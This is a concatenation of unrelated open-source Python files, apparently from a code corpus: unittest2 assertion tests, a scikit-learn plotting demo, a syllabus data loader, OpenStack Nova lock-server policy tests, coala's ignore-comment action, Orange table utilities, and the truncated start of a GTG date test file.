self.assertRaisesRegex, Exception, re.compile('x'),
lambda: None)
self.assertRaisesRegex(
self.failureException, '^Exception not raised$',
self.assertRaisesRegex, Exception, 'x',
lambda: None)
self.assertRaisesRegex(
self.failureException, '^Exception not raised$',
self.assertRaisesRegex, Exception, u('x'),
lambda: None)
def testAssertRaisesRegexInvalidRegex(self):
# Issue 20145.
class MyExc(Exception):
pass
self.assertRaises(TypeError, self.assertRaisesRegex, MyExc, lambda: True)
def testAssertWarnsRegexInvalidRegex(self):
# Issue 20145.
class MyWarn(Warning):
pass
self.assertRaises(TypeError, self.assertWarnsRegex, MyWarn, lambda: True)
def testAssertRaisesRegexMismatch(self):
def Stub():
raise Exception('Unexpected')
self.assertRaisesRegex(
self.failureException,
r'"\^Expected\$" does not match "Unexpected"',
self.assertRaisesRegex, Exception, '^Expected$',
Stub)
self.assertRaisesRegex(
self.failureException,
r'"\^Expected\$" does not match "Unexpected"',
self.assertRaisesRegex, Exception, u('^Expected$'),
Stub)
self.assertRaisesRegex(
self.failureException,
r'"\^Expected\$" does not match "Unexpected"',
self.assertRaisesRegex, Exception,
re.compile('^Expected$'), Stub)
@contextlib.contextmanager
def assertNoStderr(self):
with captured_stderr() as buf:
yield
self.assertEqual(buf.getvalue(), "")
def assertLogRecords(self, records, matches):
self.assertEqual(len(records), len(matches))
for rec, match in zip(records, matches):
self.assertIsInstance(rec, logging.LogRecord)
for k, v in match.items():
self.assertEqual(getattr(rec, k), v)
def testAssertLogsDefaults(self):
# defaults: root logger, level INFO
with self.assertNoStderr():
with self.assertLogs() as cm:
log_foo.info("1")
log_foobar.debug("2")
self.assertEqual(cm.output, ["INFO:foo:1"])
self.assertLogRecords(cm.records, [{'name': 'foo'}])
def testAssertLogsTwoMatchingMessages(self):
# Same, but with two matching log messages
with self.assertNoStderr():
with self.assertLogs() as cm:
log_foo.info("1")
log_foobar.debug("2")
log_quux.warning("3")
self.assertEqual(cm.output, ["INFO:foo:1", "WARNING:quux:3"])
self.assertLogRecords(cm.records,
[{'name': 'foo'}, {'name': 'quux'}])
def checkAssertLogsPerLevel(self, level):
# Check level filtering
with self.assertNoStderr():
with self.assertLogs(level=level) as cm:
log_foo.warning("1")
log_foobar.error("2")
log_quux.critical("3")
self.assertEqual(cm.output, ["ERROR:foo.bar:2", "CRITICAL:quux:3"])
self.assertLogRecords(cm.records,
[{'name': 'foo.bar'}, {'name': 'quux'}])
def testAssertLogsPerLevel(self):
self.checkAssertLogsPerLevel(logging.ERROR)
self.checkAssertLogsPerLevel('ERROR')
def checkAssertLogsPerLogger(self, logger):
# Check per-logger filtering
with self.assertNoStderr():
with self.assertLogs(level='DEBUG') as outer_cm:
with self.assertLogs(logger, level='DEBUG') as cm:
log_foo.info("1")
log_foobar.debug("2")
log_quux.warning("3")
self.assertEqual(cm.output, ["INFO:foo:1", "DEBUG:foo.bar:2"])
self.assertLogRecords(cm.records,
[{'name': 'foo'}, {'name': 'foo.bar'}])
# The outer catchall caught the quux log
self.assertEqual(outer_cm.output, ["WARNING:quux:3"])
def testAssertLogsPerLogger(self):
self.checkAssertLogsPerLogger(logging.getLogger('foo'))
self.checkAssertLogsPerLogger('foo')
def testAssertLogsFailureNoLogs(self):
# Failure due to no logs
with self.assertNoStderr():
with self.assertRaises(self.failureException):
with self.assertLogs():
pass
def testAssertLogsFailureLevelTooHigh(self):
# Failure due to level too high
with self.assertNoStderr():
with self.assertRaises(self.failureException):
with self.assertLogs(level='WARNING'):
log_foo.info("1")
def testAssertLogsFailureMismatchingLogger(self):
# Failure due to mismatching logger (and the logged message is
# passed through)
with self.assertLogs('quux', level='ERROR'):
with self.assertRaises(self.failureException):
with self.assertLogs('foo'):
log_quux.error("1")
def testDeepcopy(self):
# Issue: 5660
class TestableTest(unittest2.TestCase):
def testNothing(self):
pass
test = TestableTest('testNothing')
# This shouldn't blow up
deepcopy(test)
def testPickle(self):
# Issue 10326
# Can't use TestCase classes defined in Test class as
# pickle does not work with inner classes
test = unittest2.TestCase('run')
for protocol in range(pickle.HIGHEST_PROTOCOL + 1):
# blew up prior to fix
pickled_test = pickle.dumps(test, protocol=protocol)
unpickled_test = pickle.loads(pickled_test)
self.assertEqual(test, unpickled_test)
# exercise the TestCase instance in a way that will invoke
# the type equality lookup mechanism
unpickled_test.assertEqual(set(), set())
def testKeyboardInterrupt(self):
def _raise(self=None):
raise KeyboardInterrupt
def nothing(self):
pass
class Test1(unittest2.TestCase):
test_something = _raise
class Test2(unittest2.TestCase):
setUp = _raise
test_something = nothing
class Test3(unittest2.TestCase):
test_something = nothing
tearDown = _raise
class Test4(unittest2.TestCase):
def test_something(self):
self.addCleanup(_raise)
for klass in (Test1, Test2, Test3, Test4):
self.assertRaises(KeyboardInterrupt,
klass('test_something').run)
def testSkippingEverywhere(self):
def _skip(self=None):
raise unittest2.SkipTest('some reason')
def nothing(self):
pass
class Test1(unittest2.TestCase):
test_something = _skip
class Test2(unittest2.TestCase):
setUp = _skip
test_something = nothing
class Test3(unittest2.TestCase):
test_something = nothing
tearDown = _skip
class Test4(unittest2.TestCase):
def test_something(self):
self.addCleanup(_skip)
for klass in (Test1, Test2, Test3, Test4):
result = unittest2.TestResult()
klass('test_something').run(result)
self.assertEqual(len(result.skipped), 1)
self.assertEqual(result.testsRun, 1)
def testSystemExit(self):
def _raise(self=None):
raise SystemExit
def nothing(self):
pass
class Test1(unittest2.TestCase):
test_something = _raise
class Test2(unittest2.TestCase):
setUp = _raise
test_something = nothing
class Test3(unittest2.TestCase):
test_something = nothing
tearDown = _raise
class Test4(unittest2.TestCase):
def test_something(self):
self.addCleanup(_raise)
for klass in (Test1, Test2, Test3, Test4):
result = unittest2.TestResult()
klass('test_something').run(result)
self.assertEqual(len(result.errors), 1)
self.assertEqual(result.testsRun, 1)
def test_no_exception_leak(self):
# Issue #19880: TestCase.run() should not keep a reference
# to the exception
class MyException(Exception):
ninstance = 0
def __init__(self):
MyException.ninstance += 1
Exception.__init__(self)
def __del__(self):
MyException.ninstance -= 1
class TestCase(unittest.TestCase):
def test1(self):
raise MyException()
@unittest.expectedFailure
def test2(self):
raise MyException()
for method_name in ('test1', 'test2'):
testcase = TestCase(method_name)
testcase.run()
gc.collect()
self.assertEqual(MyException.ninstance, 0)
if __name__ == "__main__":
unittest2.main()
| apache-2.0 |
mathhun/scipy_2015_sklearn_tutorial | notebooks/figures/plot_kneighbors_regularization.py | 25 | 1363 | import numpy as np
import matplotlib.pyplot as plt
from sklearn.neighbors import KNeighborsRegressor
def make_dataset(n_samples=100):
rnd = np.random.RandomState(42)
x = np.linspace(-3, 3, n_samples)
y_no_noise = np.sin(4 * x) + x
y = y_no_noise + rnd.normal(size=len(x))
return x, y
def plot_regression_datasets():
fig, axes = plt.subplots(1, 3, figsize=(15, 5))
for n_samples, ax in zip([10, 100, 1000], axes):
x, y = make_dataset(n_samples)
ax.plot(x, y, 'o', alpha=.6)
def plot_kneighbors_regularization():
rnd = np.random.RandomState(42)
x = np.linspace(-3, 3, 100)
y_no_noise = np.sin(4 * x) + x
y = y_no_noise + rnd.normal(size=len(x))
X = x[:, np.newaxis]
fig, axes = plt.subplots(1, 3, figsize=(15, 5))
x_test = np.linspace(-3, 3, 1000)
for n_neighbors, ax in zip([2, 5, 20], axes.ravel()):
kneighbor_regression = KNeighborsRegressor(n_neighbors=n_neighbors)
kneighbor_regression.fit(X, y)
ax.plot(x, y_no_noise, label="true function")
ax.plot(x, y, "o", label="data")
ax.plot(x_test, kneighbor_regression.predict(x_test[:, np.newaxis]),
label="prediction")
ax.legend()
ax.set_title("n_neighbors = %d" % n_neighbors)
if __name__ == "__main__":
plot_kneighbors_regularization()
plt.show()
| cc0-1.0 |
UoMCS/syllabus-visualisation | add_initial_data.py | 1 | 5971 | #!/usr/bin/python
from __future__ import print_function
import sys
import os
import glob
import itertools
import argparse
from flask import Flask
import openpyxl
import requests
from server.app import app
from server.models import *
from server.api import get_categories
# Expected spreadsheet headers
HEADERS = [('A', 'Concept'),
('B', 'Name'),
('C', 'Unit Code'),
('D', 'Taught'),
('E', 'Applied'),
('F', 'Assessed'),
('G', 'Context')]
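# Illustrative data row matching these headers (all values hypothetical):
#   A='Linked_list', B='Linked lists', C='COMP10001', D='y', E='y', F='n',
#   G='Data_structure' (Context holds a space-separated list of topic titles).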
def to_bool(val):
return (1 if (val == 'y') else 0)
def is_custom(title):
return title.startswith('UOM:')
def is_section(title):
return "#" in title
def normalize_custom_title(title):
""" Applies WP-like normalization to a custom topics title """
return title.replace('_', ' ')
def normalize_wp_title(title):
    """ Applies WP normalization to a title, so we get its canonical form"""
params = {
'action': 'query',
'titles': title,
'format': 'json',
'indexpageids': True
}
r = requests.get('http://en.wikipedia.org/w/api.php', params=params)
    response = r.json()
    pageid = response['query']['pageids'][0]
    assert pageid != '-1', 'Title not found'
    return response['query']['pages'][pageid]['title']
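# Illustrative behaviour (hypothetical input; the canonical form is whatever the
# live Wikipedia API reports, so network access is assumed):
#   normalize_wp_title('python_(programming_language)')
#   # -> u'Python (programming language)'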
def normalize_title(title):
""" Applies correct type of normalization depending on topic type """
if is_custom(title):
return normalize_custom_title(title[4:])
else:
return normalize_wp_title(title)
def process_workbook(workbook):
sheet = openpyxl.load_workbook(workbook).get_active_sheet()
for header in HEADERS:
if sheet.cell('%s1' % header[0]).value != header[1]:
            print("Error: invalid header in spreadsheet cell %s1" % header[0])
sys.exit(1)
# We couldn't add contexts straight away, as corresponding topics might not
# yet be added. So we parse and save them here, and add after the topics are
# added
topic_contexts = []
for row in range(2,sheet.get_highest_row()+1):
if (sheet.cell('A%d' % row).value):
concept = dict()
for field in HEADERS:
concept[field[1]] = sheet.cell('%s%d' % (field[0], row)).value
# FIXME: Skipping sections for now
if is_section(concept['Concept']):
continue
# Before topic title is normalized - determine if it's custom
is_custom_concept = is_custom(concept['Concept'])
# Name might be just a duplicated identifier - we don't need it then
if concept['Name'] == concept['Concept']:
concept['Name'] = None
concept['Concept'] = normalize_title(concept['Concept'])
# Name might also be a normalized identifier - we don't need it either
if concept['Name'] == concept['Concept']:
concept['Name'] = None
topic, is_topic_new = None, None
if is_custom_concept:
topic = db.session.query(CustomTopic).filter_by(name=concept['Concept']).first()
is_topic_new = not topic
if is_topic_new:
topic = CustomTopic(concept['Concept'])
topic.description = 'Added from spreadsheets'
else:
topic = db.session.query(Topic).filter_by(name=concept['Concept']).first()
is_topic_new = not topic
if is_topic_new:
topic = Topic(concept['Concept'])
topic.categories = get_categories(topic)
if is_topic_new:
db.session.add(topic)
db.session.flush()
unit = db.session.query(Unit).filter_by(code=concept['Unit Code']).one()
unit_topic = UnitTopic(unit.id, topic.id)
unit_topic.alias = concept['Name']
unit_topic.is_taught = to_bool(concept['Taught'])
unit_topic.is_assessed = to_bool(concept['Assessed'])
unit_topic.is_applied = to_bool(concept['Applied'])
db.session.add(unit_topic)
db.session.commit()
if concept['Context']:
contexts = concept['Context'].split()
# FIXME: Remove sections for now
contexts = itertools.ifilterfalse(is_section, contexts)
# Normalise titles
contexts = map(normalize_title, contexts)
topic_contexts.append((unit_topic.id, contexts))
# Some lazy progress reporting
sys.stdout.write('.')
sys.stdout.flush()
for unit_topic_id, contexts in topic_contexts:
unit_topic = db.session.query(UnitTopic).filter_by(id=unit_topic_id).one()
unit_topic.contexts = db.session.query(Topic).filter(Topic.name.in_(contexts)).all()
print('Done')
def insert_units(units_filename):
with open(units_filename) as f:
for unit_line in f:
code, name = map(str.strip, unit_line.split(',', 1))
unit = Unit(code,name)
db.session.add(unit)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Insert initial data from spreadsheets')
parser.add_argument('db_uri', help='Database URI to insert to (e.g. sqlite:///test.db)')
parser.add_argument('data_dir', help='Directory with initial data')
args = parser.parse_args()
app.config['SQLALCHEMY_DATABASE_URI'] = args.db_uri
with app.app_context():
db.drop_all()
db.create_all()
units_filename = os.path.join(args.data_dir, 'units.txt')
insert_units(units_filename)
db.session.commit()
spreadsheets = glob.glob(os.path.join(args.data_dir, '*.xlsx'))
for workbook in spreadsheets:
print('Processing ' + workbook)
process_workbook(workbook)
db.session.commit()
| mit |
openstack/nova | nova/tests/unit/policies/test_lock_server.py | 3 | 10320 | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import fixtures
import mock
from oslo_utils.fixture import uuidsentinel as uuids
from oslo_utils import timeutils
from nova.api.openstack.compute import lock_server
from nova.compute import vm_states
from nova import exception
from nova.policies import base as base_policy
from nova.policies import lock_server as ls_policies
from nova.tests.unit.api.openstack import fakes
from nova.tests.unit import fake_instance
from nova.tests.unit.policies import base
class LockServerPolicyTest(base.BasePolicyTest):
"""Test Lock server APIs policies with all possible context.
This class defines the set of context with different roles
which are allowed and not allowed to pass the policy checks.
With those set of context, it will call the API operation and
verify the expected behaviour.
"""
def setUp(self):
super(LockServerPolicyTest, self).setUp()
self.controller = lock_server.LockServerController()
self.req = fakes.HTTPRequest.blank('')
user_id = self.req.environ['nova.context'].user_id
self.mock_get = self.useFixture(
fixtures.MockPatch('nova.api.openstack.common.get_instance')).mock
uuid = uuids.fake_id
self.instance = fake_instance.fake_instance_obj(
self.project_member_context,
id=1, uuid=uuid, project_id=self.project_id,
user_id=user_id, vm_state=vm_states.ACTIVE,
task_state=None, launched_at=timeutils.utcnow())
self.mock_get.return_value = self.instance
        # Check that admin or server owner is able to lock/unlock
# the server
self.admin_or_owner_authorized_contexts = [
self.legacy_admin_context, self.system_admin_context,
self.project_admin_context, self.project_member_context,
self.project_reader_context, self.project_foo_context]
# Check that non-admin/owner is not able to lock/unlock
# the server
self.admin_or_owner_unauthorized_contexts = [
self.system_member_context, self.system_reader_context,
self.system_foo_context,
self.other_project_member_context,
self.other_project_reader_context,
]
# Check that admin is able to unlock the server which is
# locked by other
self.admin_authorized_contexts = [
self.legacy_admin_context, self.system_admin_context,
self.project_admin_context]
# Check that non-admin is not able to unlock the server
# which is locked by other
self.admin_unauthorized_contexts = [
self.system_member_context, self.system_reader_context,
self.system_foo_context, self.project_member_context,
self.project_reader_context, self.project_foo_context,
self.other_project_member_context,
self.other_project_reader_context,
]
@mock.patch('nova.compute.api.API.lock')
def test_lock_server_policy(self, mock_lock):
rule_name = ls_policies.POLICY_ROOT % 'lock'
self.common_policy_check(self.admin_or_owner_authorized_contexts,
self.admin_or_owner_unauthorized_contexts,
rule_name,
self.controller._lock,
self.req, self.instance.uuid,
body={'lock': {}})
@mock.patch('nova.compute.api.API.unlock')
def test_unlock_server_policy(self, mock_unlock):
rule_name = ls_policies.POLICY_ROOT % 'unlock'
self.common_policy_check(self.admin_or_owner_authorized_contexts,
self.admin_or_owner_unauthorized_contexts,
rule_name,
self.controller._unlock,
self.req, self.instance.uuid,
body={'unlock': {}})
@mock.patch('nova.compute.api.API.unlock')
@mock.patch('nova.compute.api.API.is_expected_locked_by')
def test_unlock_override_server_policy(self, mock_expected, mock_unlock):
mock_expected.return_value = False
rule = ls_policies.POLICY_ROOT % 'unlock'
self.policy.set_rules({rule: "@"}, overwrite=False)
rule_name = ls_policies.POLICY_ROOT % 'unlock:unlock_override'
self.common_policy_check(self.admin_authorized_contexts,
self.admin_unauthorized_contexts,
rule_name,
self.controller._unlock,
self.req, self.instance.uuid,
body={'unlock': {}})
def test_lock_server_policy_failed_with_other_user(self):
# Change the user_id in request context.
req = fakes.HTTPRequest.blank('')
req.environ['nova.context'].user_id = 'other-user'
rule_name = ls_policies.POLICY_ROOT % 'lock'
self.policy.set_rules({rule_name: "user_id:%(user_id)s"})
exc = self.assertRaises(
exception.PolicyNotAuthorized, self.controller._lock,
req, fakes.FAKE_UUID, body={'lock': {}})
self.assertEqual(
"Policy doesn't allow %s to be performed." % rule_name,
exc.format_message())
@mock.patch('nova.compute.api.API.lock')
    def test_lock_server_overridden_policy_pass_with_same_user(
self, mock_lock):
rule_name = ls_policies.POLICY_ROOT % 'lock'
self.policy.set_rules({rule_name: "user_id:%(user_id)s"})
self.controller._lock(self.req,
fakes.FAKE_UUID,
body={'lock': {}})
class LockServerScopeTypePolicyTest(LockServerPolicyTest):
"""Test Lock Server APIs policies with system scope enabled.
This class set the nova.conf [oslo_policy] enforce_scope to True
so that we can switch on the scope checking on oslo policy side.
It defines the set of context with scoped token
which are allowed and not allowed to pass the policy checks.
With those set of context, it will run the API operation and
verify the expected behaviour.
"""
def setUp(self):
super(LockServerScopeTypePolicyTest, self).setUp()
self.flags(enforce_scope=True, group="oslo_policy")
class LockServerNoLegacyPolicyTest(LockServerScopeTypePolicyTest):
"""Test Lock Server APIs policies with system scope enabled,
and no more deprecated rules that allow the legacy admin API to
access system APIs.
"""
without_deprecated_rules = True
def setUp(self):
super(LockServerNoLegacyPolicyTest, self).setUp()
        # Check that system admin or server owner is able to lock/unlock
# the server
self.admin_or_owner_authorized_contexts = [
self.system_admin_context,
self.project_admin_context, self.project_member_context]
# Check that non-system/admin/owner is not able to lock/unlock
# the server
self.admin_or_owner_unauthorized_contexts = [
self.legacy_admin_context, self.system_member_context,
self.system_reader_context, self.system_foo_context,
self.other_project_member_context, self.project_reader_context,
self.project_foo_context,
self.other_project_reader_context,
]
# Check that system admin is able to unlock the server which is
# locked by other
self.admin_authorized_contexts = [
self.system_admin_context]
# Check that system non-admin is not able to unlock the server
# which is locked by other
self.admin_unauthorized_contexts = [
self.legacy_admin_context, self.system_member_context,
self.system_reader_context, self.system_foo_context,
self.project_admin_context, self.project_member_context,
self.other_project_member_context,
self.project_foo_context, self.project_reader_context,
self.other_project_reader_context,
]
class LockServerOverridePolicyTest(LockServerNoLegacyPolicyTest):
"""Test Lock Server APIs policies with system and project scoped
but default to system roles only are allowed for project roles
if override by operators. This test is with system scope enable
and no more deprecated rules.
"""
def setUp(self):
super(LockServerOverridePolicyTest, self).setUp()
# Check that system admin or project scoped role as override above
# is able to unlock the server which is locked by other
self.admin_authorized_contexts = [
self.system_admin_context,
self.project_admin_context, self.project_member_context]
# Check that non-system admin or project role is not able to
# unlock the server which is locked by other
self.admin_unauthorized_contexts = [
self.legacy_admin_context, self.system_member_context,
self.system_reader_context, self.system_foo_context,
self.other_project_member_context,
self.project_foo_context, self.project_reader_context,
self.other_project_reader_context,
]
def test_unlock_override_server_policy(self):
rule = ls_policies.POLICY_ROOT % 'unlock:unlock_override'
self.policy.set_rules({
# make unlock allowed for everyone so that we can check unlock
# override policy.
ls_policies.POLICY_ROOT % 'unlock': "@",
rule: base_policy.PROJECT_MEMBER_OR_SYSTEM_ADMIN}, overwrite=False)
super(LockServerOverridePolicyTest,
self).test_unlock_override_server_policy()
| apache-2.0 |
aptrishu/coala | coalib/results/result_actions/IgnoreResultAction.py | 6 | 4593 | from coalib.bearlib.languages import Language
from coalib.bearlib.languages.Language import UnknownLanguageError
from coalib.results.result_actions.ResultAction import ResultAction
from coalib.results.Result import Result
from coalib.results.Diff import Diff
from coala_utils.FileUtils import detect_encoding
from os.path import exists
from os.path import isfile
import shutil
import logging
from coala_utils.decorators import enforce_signature
class IgnoreResultAction(ResultAction):
SUCCESS_MESSAGE = 'An ignore comment was added to your source code.'
@staticmethod
@enforce_signature
def is_applicable(result: Result,
original_file_dict,
file_diff_dict,
applied_actions=()):
"""
For being applicable, the result has to point to a number of files
that have to exist i.e. have not been previously deleted.
Additionally, the action should not have been applied to the current
result before.
"""
if IgnoreResultAction.__name__ in applied_actions:
return 'An ignore comment was already added for this result.'
if len(result.affected_code) == 0:
return 'The result is not associated with any source code.'
filenames = set(src.renamed_file(file_diff_dict)
for src in result.affected_code)
if any(exists(filename) for filename in filenames):
return True
return ("The result is associated with source code that doesn't "
'seem to exist.')
def apply(self, result, original_file_dict, file_diff_dict, language: str,
no_orig: bool=False):
"""
Add (I)gnore comment
"""
ignore_comment = self.get_ignore_comment(result.origin, language)
if not ignore_comment:
return file_diff_dict
source_range = next(filter(lambda sr: exists(sr.file),
result.affected_code))
filename = source_range.file
ignore_diff = Diff(original_file_dict[filename])
ignore_diff.change_line(
source_range.start.line,
original_file_dict[filename][source_range.start.line-1],
original_file_dict[filename][source_range.start.line-1].rstrip() +
' ' + ignore_comment)
if filename in file_diff_dict:
ignore_diff = file_diff_dict[filename] + ignore_diff
else:
if not no_orig and isfile(filename):
shutil.copy2(filename, filename + '.orig')
file_diff_dict[filename] = ignore_diff
new_filename = ignore_diff.rename if ignore_diff.rename else filename
with open(new_filename, mode='w',
encoding=detect_encoding(new_filename)) as file:
file.writelines(ignore_diff.modified)
return file_diff_dict
def get_ignore_comment(self, origin, language):
r"""
Returns a string of Ignore Comment, depending on the language
Supports Single Line Comments
>>> IgnoreResultAction().get_ignore_comment("Bear", "css")
'/* Ignore Bear */\n'
And Multiline Comments
>>> IgnoreResultAction().get_ignore_comment("Bear", "c")
'// Ignore Bear\n'
"""
try:
comment_delimiter = Language[
language].get_default_version().comment_delimiter
ignore_comment = (str(comment_delimiter) + ' Ignore ' +
origin + '\n')
except AttributeError:
# singleline comments not supported by language
try:
multiline_comment_delimiter = Language[
language].get_default_version().multiline_comment_delimiters
start_comment, end_comment = next(iter(
multiline_comment_delimiter.items()))
ignore_comment = (str(start_comment) + ' Ignore ' +
origin + ' ' +
str(end_comment) + '\n')
except UnknownLanguageError:
# multiline comments also not supported by language
logging.warning(
'coala does not support Ignore in "{language}". Consider'
' opening an issue at https://github.com/coala/coala/issues'
' so we can add support for this language.'.format(
language=language))
ignore_comment = None
return ignore_comment
| agpl-3.0 |
jlegendary/orange | Orange/data/utils.py | 6 | 8732 | #from __future__ import absolute_import
from Orange.core import TransformValue, \
Ordinal2Continuous, \
Discrete2Continuous, \
NormalizeContinuous, \
MapIntValue
import random
import math
from operator import itemgetter
from collections import defaultdict
from Orange.data import Table, Domain, Instance
import Orange.feature as variable
def table_map(table, attrs, exclude_special=True):
mapping = defaultdict(list)
for i, ex in enumerate(table):
key = [ex[a] for a in attrs]
if exclude_special and any(k.isSpecial() for k in key):
continue
key = tuple([str(k) for k in key])
mapping[key].append(i)
return mapping
def left_join(table1, table2, on_attrs1, on_attrs2):
""" Left join table1 and table2 on attributes attr1 and attr2
"""
if not isinstance(on_attrs1, (list, tuple)):
on_attrs1 = [on_attrs1]
if not isinstance(on_attrs2, (list, tuple)):
on_attrs2 = [on_attrs2]
key_map1 = table_map(table1, on_attrs1)
key_map2 = table_map(table2, on_attrs2)
left_examples = []
right_examples = []
for ex in table1:
key = tuple([str(ex[a]) for a in on_attrs1])
if key in key_map1 and key in key_map2:
for ind in key_map2[key]:
ex2 = table2[ind]
left_examples.append(ex)
right_examples.append(ex2)
else:
left_examples.append(ex)
right_examples.append(Instance(table2.domain))
left_table = Table(left_examples)
right_table = Table(right_examples)
new_table = Table([left_table, right_table])
return new_table
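# Minimal usage sketch (hypothetical tables and attribute names): keep every row
# of `orders`, appending the matching `customers` columns, or an empty Instance
# of customers.domain when no key matches:
#   joined = left_join(orders, customers, 'customer_id', 'id')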
def right_join(table1, table2, on_attrs1, on_attrs2):
""" Right join table1 and table2 on attributes attr1 and attr2
"""
if not isinstance(on_attrs1, (list, tuple)):
on_attrs1 = [on_attrs1]
if not isinstance(on_attrs2, (list, tuple)):
on_attrs2 = [on_attrs2]
key_map1 = table_map(table1, on_attrs1)
key_map2 = table_map(table2, on_attrs2)
left_examples = []
right_examples = []
for ex in table2:
key = tuple([str(ex[a]) for a in on_attrs2])
if key in key_map1 and key in key_map2:
for ind in key_map1[key]:
ex1 = table1[ind]
left_examples.append(ex1)
right_examples.append(ex)
else:
left_examples.append(Instance(table1.domain))
right_examples.append(ex)
left_table = Table(left_examples)
right_table = Table(right_examples)
new_table = Table([left_table, right_table])
return new_table
def hstack(table1, table2):
""" Horizontally stack ``table1`` and ``table2``
"""
return Table([table1, table2])
def vstack(table1, table2):
""" Stack ``table1`` and ``table2`` vertically.
"""
return Table(table1[:] + table2[:])
def take(table, indices, axis=0):
""" Take values form the ``table`` along the ``axis``.
"""
indices = mask_to_indices(indices, (len(table), len(table.domain)), axis)
if axis == 0:
# Take the rows (instances)
instances = [table[i] for i in indices]
table = Table(instances) if instances else Table(table.domain)
elif axis == 1:
# Take the columns (attributes)
variables = table.domain.variables
vars = [variables[i] for i in indices]
domain = Domain(vars, table.domain.class_var in vars)
domain.add_metas(table.domain.get_metas())
table = Table(domain, table)
return table
def mask_to_indices(mask, shape, axis=0):
""" Convert a mask into indices.
"""
import numpy
mask = numpy.asarray(mask)
dtype = mask.dtype
size = shape[axis]
if dtype.kind == "b":
if len(mask) != size:
raise ValueError("Mask size does not match the shape.")
        # keep only the positions where the boolean mask is True
        indices = [i for i, m in zip(range(size), mask) if m]
elif dtype.kind == "i":
indices = mask
return indices
from threading import Lock as _Lock
_global_id = 0
_global_id_lock = _Lock()
def range_generator():
global _global_id
while True:
with _global_id_lock:
id = int(_global_id)
_global_id += 1
yield id
def uuid_generator():
import uuid
while True:
yield str(uuid.uuid4())
import Orange.feature
new_meta_id = Orange.feature.Descriptor.new_meta_id
_row_meta_id = new_meta_id()
_id_variable = variable.String("Row Id")
def add_row_id(table, start=0):
""" Add an Row Id meta variable to the table.
Parameters
==========
:param table: The ids will be added to this table.
:type table: Orange.data.Table
:param start: Start id for the ids. It can also be an iterator
yielding unique values.
:type start: int
"""
if _row_meta_id not in table.domain.get_metas():
table.domain.add_meta(_row_meta_id, _id_variable)
if isinstance(start, int):
ids = iter(range(start, start + len(table)))
else:
ids = start
for ex in table:
ex[_id_variable] = str(ids.next())
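# Minimal usage sketch (hypothetical table): number every instance sequentially,
# or draw ids from uuid_generator() when globally unique values are needed:
#   add_row_id(table)                          # "0", "1", "2", ...
#   add_row_id(table, start=uuid_generator())  # uuid4 strings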
from Orange.statistics import distribution
def modus(values):
dist = distribution.Distribution(values[0].variable)
for v in values:
dist.add(v)
return dist.modus()
def mean(values):
dist = distribution.Distribution(values[0].variable)
for v in values:
dist.add(v)
return dist.average()
def geometric_mean(values):
values = [float(v) for v in values if not v.is_special()]
if values:
prod = reduce(float.__mul__, values, 1.0)
if prod >= 0:
return math.pow(prod, 1.0/len(values))
else:
return "?"
else:
return "?"
def harmonic_mean(values):
values = [float(v) for v in values if not v.is_special()]
if values:
hsum = sum(map(lambda v: 1.0 / (v or 1e-6), values))
return len(values) / (hsum or 1e-6)
else:
return "?"
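# Worked example (plain arithmetic on hypothetical values): geometric_mean of
# 2 and 8 is (2 * 8) ** (1 / 2.0) = 4.0, and harmonic_mean of 1 and 3 is
# 2 / (1/1.0 + 1/3.0) = 1.5; in practice the inputs are Orange Value objects.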
_aggregate_mapping = {"random": random.choice,
"first": itemgetter(0),
"last": itemgetter(-1),
"modus": modus,
"mean": mean,
"geometric mean": geometric_mean,
"harmonic mean": harmonic_mean,
"min": lambda values : min( [(0,v) for v in values if not v.is_special()] + [(1,"?")] )[1],
"max": lambda values : max( [(1,v) for v in values if not v.is_special()] + [(0,"?")] )[1],
"sum": lambda values: sum([float(v) for v in values if not v.is_special()]),
"count": len,
"join": lambda values: ", ".join(map(str, values))
}
def _aggregate_func(func):
if isinstance(func, basestring):
if func in _aggregate_mapping:
return _aggregate_mapping[func]
else:
raise ValueError("Unknown aggregate function %r." % func)
return func
def group_by(table, group_attrs, aggregate_disc="first", aggregate_cont="mean",
aggregate_string="join", attr_aggregate=None):
if attr_aggregate is None:
attr_aggregate = {}
else:
attr_aggregate = dict(attr_aggregate) # It is modified later
all_vars = table.domain.variables + table.domain.getmetas().values()
aggregate_vars = []
for v in all_vars:
if v not in group_attrs:
if v in attr_aggregate:
pass
elif isinstance(v, variable.Continuous):
attr_aggregate[v] = aggregate_cont
elif isinstance(v, variable.Discrete):
attr_aggregate[v] = aggregate_disc
elif isinstance(v, variable.String):
attr_aggregate[v] = aggregate_string
else:
raise TypeError(v)
aggregate_vars.append(v)
attr_aggregate[v] = _aggregate_func(attr_aggregate[v])
indices_map = table_map(table, group_attrs, exclude_special=False)
new_instances = []
key_set = set()
for inst in table: # Iterate over the table instead of the inidces_map to preserve order
key = tuple([str(inst[v]) for v in group_attrs])
if key in key_set:
continue # Already seen this group
indices = indices_map[key]
new_instance = Instance(inst) # Copy
for v in aggregate_vars:
values = [table[i][v] for i in indices] # Values to aggregate
new_instance[v] = attr_aggregate[v](values)
new_instances.append(new_instance)
key_set.add(key)
return Table(new_instances)
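# Minimal usage sketch (hypothetical domain): collapse rows sharing a "city"
# value, averaging continuous columns and joining string columns:
#   summary = group_by(table, [table.domain["city"]],
#                      aggregate_cont="mean", aggregate_string="join")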
| gpl-3.0 |
partp/gtg-services | tests/tools/test_dates.py | 2 | 5285 | # -*- coding: utf-8 -*-
# -----------------------------------------------------------------------------
# Getting Things GNOME! - a personal organizer for the GNOME desktop
# Copyright (c) 2008-2014 - Lionel Dricot & Bertrand Rousseau
#
# This program is free software: you can redistribute it and/or modify it under
# the terms of the GNU General Public License as published by the Free Software
# Foundation, either version 3 of the License, or (at your option) any later
# version.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
# details.
#
# You should have received a copy of the GNU General Public License along with
# this program. If not, see <http://www.gnu.org/licenses/>.
# -----------------------------------------------------------------------------
from unittest import TestCase
from datetime import date, timedelta
from GTG import _
from GTG.tools.dates import Date
def next_month(aday, day=None):
""" Increase month, change 2012-02-13 into 2012-03-13.
If day is set, replace day in month as well
